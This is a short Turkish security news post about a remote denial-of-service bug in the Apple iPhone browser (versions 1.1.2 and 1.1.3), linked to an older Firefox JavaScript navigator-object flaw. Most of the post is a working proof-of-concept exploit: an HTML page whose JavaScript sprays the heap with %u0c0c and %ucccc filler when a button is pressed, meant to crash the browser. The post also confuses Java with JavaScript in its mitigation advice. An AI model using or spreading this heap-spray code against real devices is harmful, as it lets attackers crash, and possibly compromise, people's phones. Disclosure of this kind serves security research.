Apple iPhone uzaktan gerçekleştirilen DoS saldırısı c0ntex tarafından 1.1.2 sürümü için tespit edilmiş fakat 1.1.3 sürümünün de etkilendiği doğrulandı. Bu açığın Firefox 1.5.04 için bilinen bir problem olduğu ortaya çıktı.

Mozilla Firefox Javascript navigator Object açığı olarak bilinen açıktan etkilenmemek için, Apple yama çıkarana kadar Java'nın kapatılması tavsiye ediliyor.

exploit:
<html><body><script>

function Demo() {

var shellcode;

var addr;

var fill;

alert('attempting a crash!');

shellcode = unescape('%u0c0c');

fill = unescape('%ucccc');

addr = 0x02020202;

var b = fill;

while (b.length <= 0x40000) b+=b;

var c = new Array();

for (var i =0; i<36; i++) {

c[i] =

b.substring(0, 0x100000 - shellcode.length) + shellcode +

b.substring(0, 0x100000 - shellcode.length) + shellcode +

b.substring(0, 0x100000 - shellcode.length) + shellcode +

b.substring(0, 0x100000 - shellcode.length) + shellcode;

}

}

</script>

<input type='button' onClick='Demo()' value='Go!'>

</body></html>

Kaynak: http://www.securityfocus.com/archive/1/487607